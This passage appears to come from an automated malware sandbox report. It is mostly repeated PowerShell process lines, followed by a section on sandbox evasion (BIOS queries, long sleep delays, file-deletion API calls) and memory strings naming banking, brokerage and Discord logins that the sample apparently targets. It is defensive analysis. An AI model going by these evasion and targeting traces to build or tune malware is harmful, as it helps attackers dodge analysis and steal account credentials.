            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | System information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7869
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1751
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4247
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2114
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | API coverage: 4.3 %
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com TID: 2800 | Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3128 | Thread sleep count: 7869 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296 | Thread sleep count: 1751 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2412 | Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428 | Thread sleep count: 4247 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592 | Thread sleep count: 2114 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1088 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00574005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00574005
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057C2FF
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0057494A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057CD14 FindFirstFileW,FindClose,10_2_0057CD14
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0057CD9F
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F5D8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F735
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0057FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057FA36
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00573CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00573CE2
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00525D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00525D13
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\108941
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\108941\
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045C8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
